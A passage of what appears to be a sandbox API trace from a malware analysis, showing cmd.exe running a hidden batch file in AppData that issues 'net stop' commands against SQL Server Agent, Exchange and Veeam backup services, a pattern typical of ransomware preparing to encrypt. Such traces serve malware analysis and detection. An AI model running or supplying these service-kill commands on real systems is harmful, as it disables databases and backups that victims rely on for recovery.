hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$PRACTTICEBGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbc0, dwThreadId=0xb94)) returned 1 [0203.002] CloseHandle (hObject=0x74) returned 1 [0203.002] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.002] GetProcessHeap () returned 0x3e0000 [0203.002] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.002] GetEnvironmentStringsW () returned 0x3f8408* [0203.002] GetProcessHeap () returned 0x3e0000 [0203.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.003] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.003] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0203.134] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0203.134] CloseHandle (hObject=0x78) returned 1 [0203.134] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0203.134] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0203.134] GetProcessHeap () returned 0x3e0000 [0203.134] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.134] GetEnvironmentStringsW () returned 0x3f8408* [0203.134] GetProcessHeap () returned 0x3e0000 [0203.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.134] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.134] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.134] GetProcessHeap () returned 0x3e0000 [0203.134] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.134] GetEnvironmentStringsW () returned 0x3f8408* [0203.134] GetProcessHeap () returned 0x3e0000 [0203.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.135] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.135] GetProcessHeap () returned 0x3e0000 [0203.135] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0203.135] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0203.135] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.135] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0203.135] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.135] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0203.135] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.135] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0203.135] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.135] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0203.136] SetConsoleInputExeNameW () returned 0x1 [0203.136] GetConsoleOutputCP () returned 0x1b5 [0203.136] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0203.136] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0203.136] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0203.136] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.136] SetFilePointer (in: hFile=0x78, lDistanceToMove=3581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdfd [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0203.136] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0203.137] GetProcessHeap () returned 0x3e0000 [0203.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0203.137] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.137] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdfd [0203.137] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xac4, lpOverlapped=0x0) returned 1 [0203.137] SetFilePointer (in: hFile=0x78, lDistanceToMove=3608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0203.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeSRS /y\r\nBGC /y\r\n /y\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 27 [0203.137] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.138] GetFileType (hFile=0x78) returned 0x1 [0203.138] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.138] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0203.138] GetProcessHeap () returned 0x3e0000 [0203.138] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0203.138] GetProcessHeap () returned 0x3e0000 [0203.138] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0203.141] _tell (_FileHandle=3) returned 3608 [0203.141] _close (_FileHandle=3) returned 0 [0203.141] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0203.141] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0203.141] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0203.141] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0203.141] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0203.141] _wcsicmp (_String1="net", _String2="CD") returned 11 [0203.141] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0203.141] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0203.141] _wcsicmp (_String1="net", _String2="REN") returned -4 [0203.141] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0203.141] _wcsicmp (_String1="net", _String2="SET") returned -5 [0203.141] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0203.141] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0203.141] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0203.141] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0203.141] _wcsicmp (_String1="net", _String2="MD") returned 1 [0203.141] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0203.141] _wcsicmp (_String1="net", _String2="RD") returned -4 [0203.141] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0203.141] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0203.141] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0203.141] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0203.142] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0203.142] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0203.142] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0203.142] _wcsicmp (_String1="net", _String2="VER") returned -8 [0203.142] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0203.142] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0203.142] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0203.142] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0203.142] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0203.142] _wcsicmp (_String1="net", _String2="START") returned -5 [0203.142] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0203.142] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0203.142] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0203.142] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0203.142] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0203.142] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0203.142] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0203.142] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0203.142] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0203.142] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0203.142] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0203.142] SetErrorMode (uMode=0x0) returned 0x1 [0203.142] GetProcessHeap () returned 0x3e0000 [0203.142] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0203.143] GetProcessHeap () returned 0x3e0000 [0203.143] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0203.143] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.143] GetProcessHeap () returned 0x3e0000 [0203.143] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0203.143] GetProcessHeap () returned 0x3e0000 [0203.143] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0203.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.144] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.144] GetLastError () returned 0x2 [0203.144] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.144] GetLastError () returned 0x2 [0203.145] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.145] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.146] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.146] GetLastError () returned 0x2 [0203.146] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.146] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.147] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.147] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0203.147] SetErrorMode (uMode=0x0) returned 0x1 [0203.147] GetProcessHeap () returned 0x3e0000 [0203.147] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0203.147] GetProcessHeap () returned 0x3e0000 [0203.147] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0203.148] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.148] GetProcessHeap () returned 0x3e0000 [0203.148] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0203.148] GetProcessHeap () returned 0x3e0000 [0203.148] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0203.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.148] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.149] GetLastError () returned 0x2 [0203.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.149] GetLastError () returned 0x2 [0203.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.150] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.150] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.150] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.150] GetLastError () returned 0x2 [0203.151] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.151] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.151] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.151] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0203.151] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0203.152] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0203.152] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.152] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeSRS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeSRS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeSRS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5b4, dwThreadId=0x980)) returned 1 [0203.156] CloseHandle (hObject=0x78) returned 1 [0203.156] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.156] GetProcessHeap () returned 0x3e0000 [0203.156] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.156] GetEnvironmentStringsW () returned 0x3f8408* [0203.156] GetProcessHeap () returned 0x3e0000 [0203.156] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.156] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.156] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0203.345] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0203.347] CloseHandle (hObject=0x74) returned 1 [0203.347] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0203.347] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0203.347] GetProcessHeap () returned 0x3e0000 [0203.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.347] GetEnvironmentStringsW () returned 0x3f8408* [0203.347] GetProcessHeap () returned 0x3e0000 [0203.347] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.348] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.348] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.348] GetProcessHeap () returned 0x3e0000 [0203.348] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.348] GetEnvironmentStringsW () returned 0x3f8408* [0203.348] GetProcessHeap () returned 0x3e0000 [0203.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.349] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.349] GetProcessHeap () returned 0x3e0000 [0203.349] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0203.349] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0203.349] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.349] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0203.349] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.349] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0203.349] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.349] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0203.349] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.349] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0203.350] SetConsoleInputExeNameW () returned 0x1 [0203.350] GetConsoleOutputCP () returned 0x1b5 [0203.350] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0203.350] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0203.350] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0203.350] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.350] SetFilePointer (in: hFile=0x74, lDistanceToMove=3608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0203.350] GetProcessHeap () returned 0x3e0000 [0203.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0203.350] GetProcessHeap () returned 0x3e0000 [0203.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0203.350] GetProcessHeap () returned 0x3e0000 [0203.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0203.350] GetProcessHeap () returned 0x3e0000 [0203.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0203.350] GetProcessHeap () returned 0x3e0000 [0203.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0203.351] GetProcessHeap () returned 0x3e0000 [0203.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0203.351] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.351] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0203.351] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xaa9, lpOverlapped=0x0) returned 1 [0203.352] SetFilePointer (in: hFile=0x74, lDistanceToMove=3645, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe3d [0203.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=37, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$VEEAMSQL2008R2 /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 37 [0203.352] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.352] GetFileType (hFile=0x74) returned 0x1 [0203.352] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.352] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe3d [0203.352] GetProcessHeap () returned 0x3e0000 [0203.352] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0203.352] GetProcessHeap () returned 0x3e0000 [0203.353] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0203.356] _tell (_FileHandle=3) returned 3645 [0203.356] _close (_FileHandle=3) returned 0 [0203.356] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0203.356] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0203.356] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0203.356] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0203.356] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0203.356] _wcsicmp (_String1="net", _String2="CD") returned 11 [0203.356] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0203.356] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0203.356] _wcsicmp (_String1="net", _String2="REN") returned -4 [0203.356] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0203.356] _wcsicmp (_String1="net", _String2="SET") returned -5 [0203.356] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0203.356] _wcsicmp (_String1="net", 